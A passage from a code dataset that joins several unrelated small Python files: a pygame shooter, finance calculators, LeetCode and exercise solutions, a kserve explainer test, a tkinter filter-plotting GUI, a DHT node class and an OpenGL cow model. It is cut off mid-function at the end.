enemy_bullet_list:\n bul.display()\n\n\ndef key_control(heroPlane):\n\n keys = heroPlane.keyboard[heroPlane.player_num]\n key_pressed = pygame.key.get_pressed()\n if key_pressed[keys[\"up\"]]:\n heroPlane.move_up()\n if key_pressed[keys[\"down\"]]:\n heroPlane.move_down()\n if key_pressed[keys[\"left\"]]:\n heroPlane.move_left()\n if key_pressed[keys[\"right\"]]:\n heroPlane.move_right()\n if key_pressed[keys[\"shoot\"]]:\n heroPlane.shoot()\n print(EnemyPlane.finished)\n # heroPlane.sheBullet()\n\n\ndef hero_crush(heroPlane):\n num = 0\n for i in enemy_bullet_list:\n if abs(i.x - heroPlane.x - 50) + abs(i.y - heroPlane.y - 20) <= 50:\n #被击中\n heroPlane.get_hit()\n # heroPlane.crushed = 1\n break\n num += 1\n if num != len(enemy_bullet_list):\n del (enemy_bullet_list[num])\n #子弹销毁\n\n num = 0\n for i in enemy_plane_list:\n if abs(i.x - heroPlane.x - 50) + abs(i.y - heroPlane.y - 20) <= 50:\n # 被击中\n # heroPlane.crushed = 1\n heroPlane.get_hit()\n break\n num += 1\n if num != len(enemy_plane_list):\n EnemyPlane.finished += 1\n EnemyPlane.crushed += 1\n del (enemy_plane_list[num])\n\n return True\n\n\ndef enemy_crush():\n num = 0\n for i in enemy_plane_list:\n num_j = 0\n for j in hero_bullet_list:\n if abs(i.x - j.x + 25) + abs(i.y - j.y + 20) <= 30:\n EnemyPlane.finished += 1\n EnemyPlane.crushed += 1\n break\n num_j += 1\n if num_j != len(hero_bullet_list):\n del enemy_plane_list[num]\n del hero_bullet_list[num_j]\n\n num += 1\n return False\n\n\ndef score(screen, hero_plane):\n \"\"\"绘制每个飞机的血量信息\"\"\"\n\n # 绘制玩家飞机血量\n score_font = pygame.font.Font(None, 36)\n score_text = score_font.render(\"Health:\"+str(hero_plane.health), True, (128, 128, 128))\n text_rect = score_text.get_rect()\n text_rect.topleft = [10, 10]\n screen.blit(score_text, text_rect)\n\n # 绘制玩家得分\n score_font = pygame.font.Font(None, 36)\n score_text = score_font.render(\"Score{0}:\".format(1)+str(EnemyPlane.crushed), True, (128, 128, 128))\n text_rect = score_text.get_rect()\n text_rect.topleft = [10, 50]\n screen.blit(score_text, text_rect)\n\n # # 绘制敌机飞机血量\n # score_font = pygame.font.Font(None, 36)\n # score_text = score_font.render(str(enemy_plane.blood), True, (128, 128, 128))\n # text_rect = score_text.get_rect()\n # text_rect.topleft = [10, 50]\n # screen.blit(score_text, text_rect)\n\n\ndef judge_win_or_lose(hero_plane):\n \"\"\"用来完成输赢的判断\"\"\"\n\n if hero_plane.health <= 0:\n return \"lose\"\n elif EnemyPlane.finished >= 40:\n return \"win\"\n\n\nif __name__ == \"__main__\":\n play()\n\n","repo_name":"useysw/py_plane","sub_path":"py_plane.py","file_name":"py_plane.py","file_ext":"py","file_size_in_byte":10048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32604264739","text":"#!/usr/bin/env python3\nimport sys\nimport re\n\nif(len(sys.argv) == 1):\n print(f\"error: {sys.argv[0]} needs filenames\", file=sys.stderr)\n sys.exit(1)\n \nfilename = sys.argv[1]\ncnt = 0\nwith open(filename, \"r\", encoding='utf-8') as f:\n for line in f:\n temp = re.findall('[\\d]+', line)\n temp = [int(x) for x in temp]\n cnt += sum(temp)\nprint(cnt)","repo_name":"Shaddock-L/comp9044","sub_path":"wk07/lab07/summing_numbers.py","file_name":"summing_numbers.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32699283426","text":"import math\n\n#printing out initial information for user to pick from\n#the programme uses white space to make text more readable\nx= \" 
\"\nprint(\"Choose either 'investment' or 'bond' from the menu below to proceed:\")\nprint(f\"\\ninvestment{2*x}-{2*x}to calculate the amount of interest you'll earn on your investment\")\nprint(f\"bond{8*x}-{2*x}to calculate the amount you'll have to pay on a home loan\")\n\n#the user chooses between investment and bond\n#if input is invalid, the programme will ask again until valid answer is inputted\nwhile True:\n choice = input(\"\\nWhat is your choice?\").lower()\n if (choice == \"investment\") or (choice == \"bond\"):\n break\n else:\n print(\"Invalid answer. Please try again.\")\n\n#the following code runs if the user inputs interest\n#calculating the interest depending on whether the user inputs simple or compound\n#displaysthe amount they get back after a given period\nif choice == \"investment\":\n deposit = float(input(\"\\nHow much money are you depositing?\"))\n interest_rate = float(input(\"\\nWhat is the interest rate?\"))\n r=interest_rate/100\n num_years = int(input(\"\\nHow many years do you plan on investing?\"))\n while True:\n interest = input(\"\\nWould you like simple or compound interest?\").lower()\n if (interest == \"simple\") or (interest == \"compound\"):\n break\n else:\n print(\"Invalid answer. Please try again\")\n if interest == \"simple\":\n amount = deposit*(1+r*num_years)\n elif interest == \"compound\":\n amount = deposit*math.pow((1+r),num_years)\n print(\"\\nAfter {} years you will get back £{:.2f}.\".format(num_years,amount))\n\n#the following code runs if the user inputs bond\n#calculating the amount they have to repay each month\nelif choice == \"bond\":\n value_house = float(input(\"\\nWhat is the present value of the house?\"))\n interest_rate = float(input(\"\\nWhat is the interest rate?\"))\n monthly_interest_rate = interest_rate/(12*100)\n num_months = int(input(\"\\nHow many months do you plan to take to repay the bond?\"))\n\n repayment = (monthly_interest_rate * value_house)/(1-(1+monthly_interest_rate)**(-num_months))\n print(\"\\nEach month you will have to repay £{:.2f}.\".format(repayment))\n","repo_name":"jasmine-doyle/Capstone-1","sub_path":"finance_calculators.py","file_name":"finance_calculators.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22419429596","text":"from typing import List\n\n\n# 1. 
两数之和\n# 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标。\n#\n# 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n hashMap = {}\n for i in range(len(nums)):\n if hashMap.get(nums[i]):\n hashMap[nums[i]].append(i)\n else:\n hashMap[nums[i]] = [i]\n for num in nums:\n val = hashMap.get(target - num)\n if val is not None:\n if num == target - num:\n if len(val) > 1:\n return val[:2]\n else:\n continue\n else:\n return [hashMap[num][0], val[0]]\n","repo_name":"JackTJC/LeetCode","sub_path":"data_structure/hashtable/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17261521382","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\ndef str_dict(string):\n dict = {}\n for i in string:\n if i in dict.keys():\n dict[i] += 1\n continue\n dict[i] = 1\n return dict\n\nfor tc in range(1, T+1):\n str1 = list(set(input()))\n str2 = str_dict(input())\n\n num_of_max = 0\n for i in str1:\n if num_of_max < str2.get(i):\n num_of_max = str2.get(i)\n\n\n print(\"#{} {}\".format(tc, num_of_max))\n\n","repo_name":"Gwanghun-Im/algorithm_study","sub_path":"4865_글자수/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23495381271","text":"from alibiexplainer.anchor_images import AnchorImages\nimport os\nimport tensorflow as tf\nimport json\nimport numpy as np\nimport dill\nfrom kserve.storage import Storage\n\n\nCIFAR10_EXPLAINER_URI = \"gs://kfserving-examples/models/tensorflow/cifar/explainer-0.9.1\"\nEXPLAINER_FILENAME = \"explainer.dill\"\n\n\ndef test_cifar10_images(): # pylint: disable-msg=too-many-locals\n os.environ.clear()\n alibi_model = os.path.join(\n Storage.download(CIFAR10_EXPLAINER_URI), EXPLAINER_FILENAME\n )\n with open(alibi_model, \"rb\") as f:\n alibi_model = dill.load(f)\n url = \"https://storage.googleapis.com/seldon-models/alibi-detect/classifier/\"\n path_model = os.path.join(url, \"cifar10\", \"resnet32\", \"model.h5\")\n save_path = tf.keras.utils.get_file(\"resnet32\", path_model)\n model = tf.keras.models.load_model(save_path)\n _, test = tf.keras.datasets.cifar10.load_data()\n X_test, _ = test\n X_test = X_test.astype(\"float32\") / 255\n idx = 12\n test_example = X_test[idx: idx + 1]\n anchor_images = AnchorImages(\n lambda x: model.predict(x), alibi_model) # pylint: disable-msg=unnecessary-lambda\n np.random.seed(0)\n explanation = anchor_images.explain(test_example)\n exp_json = json.loads(explanation.to_json())\n assert exp_json[\"data\"][\"precision\"] > 0.9\n","repo_name":"kserve/kserve","sub_path":"python/alibiexplainer/tests/test_anchor_images.py","file_name":"test_anchor_images.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":2598,"dataset":"github-code","pt":"52"} +{"seq_id":"26216254489","text":"import json\n\nfilename = r'E:\\新建文件夹\\weather.api\\src\\main\\resources\\citycode-2019-08-23.json'\n\n\ndef openfile(filename, encoding='utf-8'):\n with open(filename, 'r', encoding=encoding)as f:\n return json.loads(f.read())\n\n\n# for i in city_code_list:\n# # print(i)\n# if i['city_code'] != '':\n# print(i['city_name'], i['city_code'])\n\ndef get_city_code(citynames):\n cityname_list = []\n city_infos = openfile(filename)\n for i in city_infos:\n for cityname in 
citynames:\n if i['city_name'] == cityname:\n cityname_list.append((i['city_name'], i['city_code']))\n return cityname_list\n\n\ndef main(citynames):\n city_codes = get_city_code(citynames)\n return city_codes\n\n\nif __name__ == '__main__':\n # citynames = ['隰县', '临汾', '太原', '北京']\n citynames = ['隰县']\n print(main(citynames)[0][0])\n","repo_name":"Sharkchili-git/homework","sub_path":"HelloDjango/weatherapi/city_code.py","file_name":"city_code.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33935838774","text":"import tkinter as tk\nimport Config\nfrom tkinter import *\n\nfrom UserInput import *\n\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.backends._backend_tk import NavigationToolbar2Tk\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import signal\nfrom numpy import pi\n\n\n#Este menu es el correspondiente al grafico de Bode\nclass Grafico(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent, bg='#42f498')\n\n self.controller = controller\n self.parent = parent\n\n self.graph = tk.Canvas(self)\n\n self.fig, self.ax1 = plt.subplots()\n\n self.dataPlot = FigureCanvasTkAgg(self.fig, master=self.graph)\n self.nav = NavigationToolbar2Tk(self.dataPlot, self.graph)\n self.dataPlot.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n self.dataPlot._tkcanvas.pack(side=tk.BOTTOM, fill=tk.X, expand=1)\n\n self.graph.pack(side=tk.TOP, expand=1, fill=tk.BOTH)\n\n self.backButton = tk.Button(\n self,\n height=2,\n width=50,\n text=\"Volver\",\n font=Config.SMALL_FONT,\n background=\"#cfffd5\",\n command=self.goback\n\n )\n self.backButton.pack(side=tk.TOP, fill=tk.BOTH)\n\n def focus(self):\n self.ax1.clear()\n\n self.ax1.minorticks_on()\n self.ax1.grid(which='major', linestyle='-', linewidth=0.3, color='black')\n self.ax1.grid(which='minor', linestyle=':', linewidth=0.1, color='black')\n\n\n #Aca decide qeu dibujar, puede dibujar orden 1 o 2, luego alto, bajo, tod, banda o notch, y luego en rads, hertz dbs o bs\n if orden['orden1']:\n if filtro['alto']:\n self.plotPasaAlto1Orden()\n elif filtro['bajo']:\n self.plotPasaBajo1Orden()\n else:\n self.plotPasaTodo1Orden()\n elif orden['orden2']:\n if filtro['alto']:\n self.plotPasaAlto2Orden()\n elif filtro['bajo']:\n self.plotPasaBajo2Orden()\n elif filtro['todo']:\n self.plotPasaTodo2Orden()\n elif filtro['banda']:\n self.plotPasaBanda2Orden()\n else:\n self.plotPasaNotch2Orden()\n\n self.dataPlot.draw()\n\n\n def goback(self):\n from Menu_Order1 import Orden1\n self.controller.showFrame(Orden1)\n\n\n\n #en esta función esta lo qeu dibujo ya sea el bode o el grafico de la respuesta\n #decide de que tipo de garfico se tratasegun lo qeu dice userinput y luego lo grafica\n def plotPasaAlto1Orden(self):\n ganancia = userinput['c']\n f0 = userinput['f0']\n w0 = 2 * pi * f0\n\n k = ganancia/w0\n ceros = [k, 0]\n polos = [0, 1/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n f = w/(2 * pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaBajo1Orden(self):\n ganancia = userinput['c']\n f0 = userinput['f0']\n w0 = 2 * pi * f0\n\n k = ganancia\n ceros = [k]\n polos = [0, 1/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n f = w / (2 * pi)\n\n if modo['Bode']:\n 
self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaTodo1Orden(self):\n ganancia = userinput['c']\n f0 = userinput['f0']\n k = ganancia\n\n w0 = f0 * 2 * pi\n ceros = [k / w0, -k]\n polos = [0, 1 / w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n f = w / (2 * pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n def plotPasaAlto2Orden(self):\n e = userinput['e']\n w0 = userinput['wo']\n\n if ganancia['gmax']:\n gain = userinput['cmax']\n k = ((2 * e * gain * np.sqrt(1 - e * e))/(w0 * w0))\n\n else:\n gain = userinput['c']\n k = gain/(w0*w0)\n\n ceros = [k, 0, 0]\n polos = [1/(w0*w0), (2*e)/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, n=500)\n f = w/np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n\n def plotPasaBajo2Orden(self):\n w0 = userinput['wo']\n e = userinput['e']\n\n if ganancia['gmax']:\n gain = userinput['cmax']\n k = gain * 2 * e * np.sqrt(1 - e * e)\n else:\n gain = userinput['c']\n k = gain\n\n ceros = [k]\n polos = [1/(w0*w0), 2*e/w0, 1]\n\n sys2 = signal.lti(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, n=500)\n\n f = w/np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaTodo2Orden(self):\n ganancia = userinput['c']\n w0 = userinput['wo']\n e = userinput['e']\n\n k = ganancia\n\n ceros = [k/(w0**2), -2*k*e/w0, k]\n polos = [1 / (w0 * w0), 2 * e / w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2)\n\n f = w / np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n\n def plotPasaBanda2Orden(self):\n w0 = userinput['wo']\n e = userinput['e']\n\n gain = userinput['c']\n k = gain * 2 * e / w0\n\n ceros = [k, 0]\n polos = [1/(w0**2), 2*e/w0, 1]\n\n sys2 = signal.TransferFunction(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, w=None, n=500)\n\n f = w/np.pi\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n def plotPasaNotch2Orden(self):\n ganancia = userinput['c']\n w0 = userinput['wo']\n e = userinput['e']\n\n k = ganancia\n ceros = [k / (w0 ** 2), 0, k]\n polos = [1 / (w0 ** 2), 2 * e / w0, 1]\n\n sys2 = signal.lti(ceros, polos)\n\n w, dB, phase = signal.bode(sys2, n=500)\n\n f = w / (2 * np.pi)\n\n if modo['Bode']:\n self.grafBode(f, dB, w)\n elif modo['Bodefase']:\n self.grafBodefase(f, w, phase)\n else:\n self.grafSignal(sys2, w0)\n\n def grafBode(self, f, dB, w):\n if ejex['Hertz'] and ejey['Decibeles']:\n self.ax1.semilogx(f, dB)\n self.ax1.set_xlabel('Hz')\n self.ax1.set_ylabel('dB')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n elif ejex['Radianes'] and ejey['Decibeles']:\n self.ax1.semilogx(w, dB)\n self.ax1.set_xlabel('rad/s')\n self.ax1.set_ylabel('B')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n elif ejex['Hertz'] and ejey['Veces']:\n veces = 10**(dB/20)\n self.ax1.semilogx(f, veces)\n self.ax1.set_xlabel('Hz')\n self.ax1.set_ylabel('|H| veces')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n elif ejex['Radianes'] and 
ejey['Veces']:\n veces = 10**(dB/20)\n self.ax1.semilogx(w, veces)\n self.ax1.set_xlabel('rad/s')\n self.ax1.set_ylabel('|H| veces')\n self.ax1.set_title('Base 10')\n self.ax1.grid(True)\n\n def grafSignal(self, sys2, w0):\n if senhal['senoide']:\n amp = senhalparams['Amplitud']\n w1 = senhalparams['frecuencia']\n t = np.linspace(0, 5, 500)\n u = amp * np.sin(w1 * t)\n\n tout, y, x = signal.lsim(sys2, u, t)\n\n self.ax1.plot(tout, y)\n self.ax1.set_xlabel('seg')\n self.ax1.set_ylabel('A (ammplitud)')\n self.ax1.grid(True)\n\n elif senhal['pulso']:\n amp = senhalparams['Amplitud']\n t = np.linspace(0, 5 * (1 / w0), 5000)\n u = amp * (np.sign(t) + 1)\n\n tout, y, x = signal.lsim(sys2, u, t)\n\n self.ax1.plot(tout, y)\n self.ax1.set_xlabel('seg')\n self.ax1.set_ylabel('A (ammplitud)')\n self.ax1.grid(True)\n\n else:\n amp = senhalparams['Amplitud']\n duty = senhalparams['DutyCicle']\n f1 = senhalparams['frecuencia']\n w1 = f1 * 2 * np.pi\n t = np.linspace(0, 2, 500)\n u = amp * signal.square(2 * np.pi * w1 * t, duty)\n\n tout, y, x = signal.lsim(sys2, u, t)\n\n self.ax1.plot(tout, y)\n self.ax1.set_xlabel('seg')\n self.ax1.set_ylabel('A (ammplitud)')\n self.ax1.grid(True)\n\n def grafBodefase(self, f, w, phase):\n\n if ejex['Radianes'] and ejey['Grados']:\n self.ax1.semilogx(w, phase)\n self.ax1.set_xlabel('rad/s')\n self.ax1.set_ylabel('Grados')\n self.ax1.grid(True)\n\n elif ejex['Hertz'] and ejey['Grados']:\n self.ax1.semilogx(f, phase)\n self.ax1.set_xlabel('Hz')\n self.ax1.set_ylabel('Grados')\n","repo_name":"CarlosAngelChen/tp-electrotecnia","sub_path":"GUI/Menu_Grafico.py","file_name":"Menu_Grafico.py","file_ext":"py","file_size_in_byte":9847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32315928924","text":"import threading\nimport time\nfrom random import randint\n\nfrom node import Node\nfrom node_proxy import NodeProxy\n\n\nclass DynamicNode(Node):\n ALLOWED_ACTIONS = Node.ALLOWED_ACTIONS.union({\n 'join_response_success',\n 'join_response_failure'\n })\n\n def __init__(self, node_list, *args, **kwargs):\n super(DynamicNode, self).__init__(*args, **kwargs)\n\n self.node_list = node_list\n self.joined = False\n self.wait_for_join_response = None\n\n def run(self):\n server_thread = threading.Thread(target=self.tcp_server.serve_forever)\n server_thread.daemon = True\n server_thread.start()\n self._join_network()\n\n def _join_network(self):\n while not self.joined:\n node_index = randint(0, len(self.node_list)-1)\n selected_node = NodeProxy(*self.node_list[node_index])\n _, _, next_id_number = self.node_list[(node_index+1) %\n len(self.node_list)]\n\n my_id = randint(*sorted((selected_node.id_number+1,\n next_id_number)))\n\n self.wait_for_join_response = True\n try:\n selected_node.join(\n id_number=my_id,\n recipient_ip=self.node.ip,\n recipient_port=self.node.port\n )\n except IOError:\n self.logger.error(\"static node %s not responding\" %\n selected_node.id_number)\n self.wait_for_join_response = False\n\n while self.wait_for_join_response:\n time.sleep(1)\n\n self.retrieve_data()\n \n def retrieve_data(self):\n self.logger.debug('retrieving data')\n data = self.next_node.get_smaller_key_values(key=self.node.id_number)\n self.logger.debug('data received: %s' % str(data))\n self.dictionary.update(data)\n \n def join_response_success(self, id_number,\n prev_ip, prev_port, prev_id, next_ip,\n next_port, next_id, second_next_ip,\n second_next_port, second_next_id):\n self.logger.debug(\"join successful, id: %d\" % 
id_number)\n self.node.id_number = id_number\n self.prev_node = NodeProxy(prev_ip, prev_port, prev_id)\n self.next_node = NodeProxy(next_ip, next_port, next_id)\n self.second_next_node = NodeProxy(second_next_ip, second_next_port,\n second_next_id)\n self.joined = True\n self.wait_for_join_response = False\n\n def join_response_failure(self, message):\n self.logger.debug(\"join failed because \"+message)\n self.wait_for_join_response = False\n","repo_name":"sjazayeri/network-ca3","sub_path":"dht/dynamic_node.py","file_name":"dynamic_node.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23421562378","text":"class Student:\n major=\"CSE\"\n def __init__(self,rollNum,name):\n self.rollNum=rollNum\n self.name=name\ns1 = Student(1,\"Neeraj\")\nprint(s1.major)\nprint(s1.rollNum)\nprint(s1.name)\nprint(Student.major)","repo_name":"Neeraj909/pythonLearning","sub_path":"Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22018280835","text":"from OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\nfrom OpenGL.GLUT import *\r\nfrom texture import load_texture\r\nfrom utils import draw_item, draw_item_texture, textured_sphere, draw_solid_sphere\r\n\r\ndef cow(center_x, center_z, len_z, head_angle_display_r, head_angle_display_u, \r\n tail_angle_display_r, tail_angle_display_u, left_legs_angle_u, right_legs_angle_u, legs_angle_l_r):\r\n leg_len = len_z\r\n len_x = len_y = (2/3)*len_z\r\n center_y = len_y/2 + leg_len\r\n\r\n # body\r\n glColor3f(1, 1, 1)\r\n draw_body(center_x, center_y, center_z, len_x, len_y, len_z)\r\n # head\r\n head_x = center_x\r\n head_y = center_y + (1/3)*len_y\r\n head_z = center_z - (3/7)*len_z\r\n\r\n neck_x = len_x/3\r\n neck_y = len_x/2\r\n neck_z = len_x\r\n\r\n draw_head(head_x, head_y, head_z, neck_x, neck_y, neck_z, head_angle_display_r, head_angle_display_u)\r\n # legs\r\n draw_tail(center_x, center_y, center_z + (7/8)*len_z, len_x, \r\n tail_angle_display_r, tail_angle_display_u)\r\n draw_legs(center_x, center_y, center_z, len_x, len_z, left_legs_angle_u, right_legs_angle_u, legs_angle_l_r)\r\n\r\ndef draw_legs(center_x, center_y, center_z, len_x, len_z, left_angle_u, right_angle_u, angle_l_r):\r\n glColor3f(1,1,1)\r\n weidth_x = (3/7)*len_x\r\n weidth_z = (3/2)*weidth_x\r\n\r\n draw_leg(center_x - (1/2)*len_x, center_y, center_z - (3/4)*len_z , weidth_x, weidth_z, \r\n left_angle_u, angle_l_r)\r\n draw_leg(center_x - (1/2)*len_x, center_y, center_z + (3/4)*len_z - weidth_z, \r\n weidth_x, weidth_z, left_angle_u, angle_l_r)\r\n draw_leg(center_x + (1/2)*len_x - weidth_x, center_y, center_z - (3/4)*len_z, \r\n weidth_x, weidth_z, right_angle_u, angle_l_r)\r\n draw_leg(center_x + (1/2)*len_x - weidth_x, center_y, center_z + (3/4)*len_z - weidth_z, \r\n weidth_x, weidth_z, right_angle_u, angle_l_r)\r\n \r\ndef draw_leg(x,y,z, weidth_x, weidth_z, angle_u, angle_l_r):\r\n hoof_heigth = weidth_x\r\n vertices = [(x, y, z), # first four top ssquare\r\n (x, y, z + weidth_z),\r\n (x + weidth_x, y, z + weidth_z),\r\n (x + weidth_x, y, z),\r\n (x, hoof_heigth, z), # second four bottom ssquare\r\n (x, hoof_heigth, z + weidth_z),\r\n (x + weidth_x, hoof_heigth, z + weidth_z),\r\n (x + weidth_x, hoof_heigth, z),\r\n (x, 0, z - (1/3)*weidth_z), # hoof bace\r\n (x, 0, z + weidth_z),\r\n (x + weidth_x, 0, z + weidth_z),\r\n (x + weidth_x, 0, z - 
(1/3)*weidth_z)] \r\n indices = [(0, 1, 2, 3),\r\n (0, 1, 5, 4),\r\n (1, 2, 6, 5),\r\n (2, 3, 7, 6),\r\n (0, 3, 7, 4),\r\n (5, 6, 10, 9),\r\n (6, 7, 11, 10),\r\n (7, 4, 8, 11),\r\n (4, 5, 9, 8),\r\n (8, 9, 10, 11)] \r\n leg_texture_id = load_texture(\"legs_texture.png\")\r\n\r\n glPushMatrix()\r\n glTranslate(x,y,z)\r\n glRotatef(angle_u, 1, 0, 0)\r\n glRotatef(angle_l_r, 0, 0, 1)\r\n glTranslate(-x,-y,-z)\r\n draw_item_texture(vertices, indices, leg_texture_id, 1)\r\n glPopMatrix()\r\n\r\ndef draw_body(center_x, center_y, center_z, len_x, len_y, len_z):\r\n cow_texture_id = load_texture(\"cow_texture.png\")\r\n textured_sphere(center_x, center_y, center_z, len_x, len_y, len_z, cow_texture_id)\r\n draw_udders(center_x, center_y-(3/4)*len_y, center_z, len_x/2)\r\n\r\ndef draw_head(x, y, z, neck_x, neck_y, neck_z, head_angle_display_r, head_angle_display_u): # (x,y,z) point inside body\r\n vertices = [(x, y, z), #0\r\n (x-neck_x, y+neck_y, z-neck_z), #1\r\n (x+neck_x, y+neck_y, z-neck_z), #2\r\n (x+2*neck_x, y, z-neck_z), #3\r\n (x, y-neck_y, z-neck_z), #4\r\n (x-2*neck_x, y, z-neck_z), #5\r\n (x-2*neck_x, y-neck_y,z-(4/3)*neck_z), #6\r\n (x+2*neck_x, y-neck_y,z-(4/3)*neck_z), #7\r\n (x-(1/2)*neck_x, y+(1/2)*neck_y, z-(11/6)*neck_z), #8\r\n (x+(1/2)*neck_x, y+(1/2)*neck_y, z-(11/6)*neck_z), #9\r\n (x-(1/2)*neck_x, y+(1/2)*neck_y, z-(13/6)*neck_z), #10\r\n (x+(1/2)*neck_x, y+(1/2)*neck_y, z-(13/6)*neck_z), #11\r\n (x+(3/4)*neck_x, y-neck_y,z-(13/6)*neck_z), #12\r\n (x+(3/4)*neck_x, y-(1/2)*neck_y,z-(13/6)*neck_z), #13\r\n (x-(3/4)*neck_x, y-neck_y,z-(13/6)*neck_z), #14\r\n (x-(3/4)*neck_x, y-(1/2)*neck_y,z-(13/6)*neck_z)] #15\r\n indices = [((0, 1, 2), 1),\r\n ((0, 2, 3), 0),\r\n ((0, 3, 4), 0),\r\n ((0, 4, 5), 0),\r\n ((0, 5, 1), 0),\r\n ((2, 3, 7), 0),\r\n ((1, 5, 6), 0),\r\n ((3, 4, 7), 0),\r\n ((4, 5, 6), 0),\r\n ((4, 6, 7), 0),\r\n ((6, 7, 12, 14), 0),\r\n ((1, 2, 9, 8), 1),\r\n ((2, 7, 12, 9), 0),\r\n ((1, 6, 14, 8), 0),\r\n ((8, 9, 11, 10), 1),\r\n ((9, 11, 13, 12), 2),\r\n ((8, 10, 15, 14), 2),\r\n ((12, 14, 15, 13), 2),\r\n ((10, 11, 13, 15), 2)]\r\n colors = [(0,0,0), # black\r\n (1,1,1), # white\r\n (1, 204/255, 204/255) # pink\r\n ]\r\n glPushMatrix()\r\n glTranslate(x,y,z)\r\n glRotatef(head_angle_display_r, 0, 1, 0)\r\n glRotatef(head_angle_display_u, 1, 0, 0)\r\n glTranslate(-x,-y,-z)\r\n draw_item(vertices, indices, colors)\r\n \r\n left_eye = (x-neck_x, y+(1/3)*neck_y,z-(4/3)*neck_z)\r\n right_eye = (x+neck_x, y+(1/3)*neck_y,z-(4/3)*neck_z)\r\n left_ear = vertices[5]\r\n right_ear = vertices[3]\r\n left_nose = (x-(1/4)*neck_x, y+(1/4)*neck_y, z-(13/6)*neck_z)\r\n right_nose = (x+(1/4)*neck_x, y+(1/4)*neck_y, z-(13/6)*neck_z)\r\n\r\n eyes(left_eye,right_eye, (1/2)*neck_x)\r\n ears(left_ear, right_ear, neck_x, (3/4)*neck_x)\r\n nose(left_nose,right_nose, (1/4)*neck_x)\r\n glPopMatrix()\r\n\r\ndef nose(left,right, size):\r\n glColor3f(0, 0, 0)\r\n x, y, z = left\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n x, y, z = right\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n\r\ndef eyes(left,right, size):\r\n one_eye(left, \"left\", size)\r\n one_eye(right, \"right\", size)\r\n\r\ndef one_eye(place,side,size):\r\n glColor3f(1, 1, 1)\r\n x, y, z = place\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n glColor3f(0, 0, 0)\r\n if side == \"left\":\r\n x -= (2/3)*size\r\n else:\r\n x += (2/3)*size\r\n size = size/2\r\n z -= size\r\n draw_solid_sphere(x, y, z, size, size, size)\r\n\r\ndef ears(left,right, len, weidth):\r\n one_ear(left, \"left\", len, weidth)\r\n 
